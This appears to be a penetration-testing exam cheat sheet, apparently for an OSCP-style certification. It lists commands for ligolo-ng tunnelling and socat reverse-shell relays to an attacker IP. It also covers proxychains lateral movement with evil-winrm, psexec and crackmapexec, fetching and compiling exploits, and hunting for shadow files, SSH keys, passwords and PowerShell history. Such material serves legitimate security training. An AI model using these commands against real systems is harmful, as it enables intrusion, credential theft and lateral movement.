sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601

# Target: run agent
./agent -connect <attacker_IP>:11601 -ignore-cert

# Attacker (in ligolo-ng console):
session                             # select session
start                               # start tunnel

# Add route to internal network
sudo ip route add 192.168.2.0/24 dev ligolo

# Port forward: expose listener on agent side → attacker port
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444

# Config file: /etc/proxychains4.conf
# Add at bottom:
# socks5 127.0.0.1 1080

proxychains nmap -sT -Pn -n 192.168.2.1
proxychains curl http://192.168.2.1
proxychains evil-winrm -i 192.168.2.10 -u admin -p pass
proxychains impacket-psexec domain/user:pass@192.168.2.10
proxychains crackmapexec smb 192.168.2.0/24 -u user -p pass

# Quiet mode (less spam)
proxychains -q nmap ...

# Port relay (forward port to internal host)
socat TCP-LISTEN:8080,fork TCP:<internal_IP>:80

# Reverse shell relay through pivot
# On pivot:
socat TCP-LISTEN:4444,fork TCP:<attacker_IP>:4444

searchsploit apache 2.4.49
searchsploit -t "apache 2.4"              # title only
searchsploit --id apache                  # show EDB IDs
searchsploit -m 40839                     # copy exploit to cwd
searchsploit -x 40839                     # examine without copying
searchsploit -u                           # update database
searchsploit -p 40839                     # show full path

# Linux
gcc exploit.c -o exploit
gcc -m32 exploit.c -o exploit32          # 32-bit
gcc exploit.c -o exploit -pthread -lcrypt

# Cross-compile for Windows
x86_64-w64-mingw32-gcc exploit.c -o exploit64.exe
i686-w64-mingw32-gcc exploit.c -o exploit32.exe
x86_64-w64-mingw32-gcc -o exploit.exe exploit.c -lws2_32   # with winsock

# Find files
find / -name "proof.txt" 2>/dev/null
find / -name "local.txt" 2>/dev/null
find / -name "*.txt" 2>/dev/null | grep -v proc

# Find setuid files recently modified
find / -perm -4000 -newer /tmp -type f 2>/dev/null

# Check network
ss -tulnp
netstat -antp
ip route
arp -n
cat /etc/hosts
cat /etc/resolv.conf

# Check running processes
ps auxf
ps aux | grep root

# Readable shadow/passwd backup
find / -name "shadow*" -o -name "passwd*" 2>/dev/null

# SSH keys
find / -name "id_rsa" -o -name "id_ecdsa" -o -name "authorized_keys" 2>/dev/null

# Readable backup files
find / -name "*.bak" -o -name "*.backup" -o -name "*.old" 2>/dev/null | grep -v proc

# Find proof files
dir /s /b proof.txt 2>nul
where /r C:\ proof.txt

# Find passwords in files
findstr /si "password" *.txt *.ini *.config *.xml *.ps1

# Active network connections
netstat -ano
netstat -ano | findstr LISTEN

# Scheduled tasks
schtasks /query /fo LIST /v | findstr /i "task\|run\|status"

# Installed 32-bit software
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" /s | findstr DisplayName

# PowerShell history
type C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Check AppLocker
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

# Collect proof files
cat /root/proof.txt           # Linux root
type C:\Users\Administrator\Desktop\proof.txt   # Windows admin

# Take screenshot showing:
# - proof.txt contents
# - ipconfig / ip a (confirms machine IP)
# - whoami (confirms privilege level)

# Note: You can use Metasploit on ONE machine only
# AD set: 3 machines, worth 40 points total
# Standalone: 3 machines, 60 points total
# Passing score: 70 points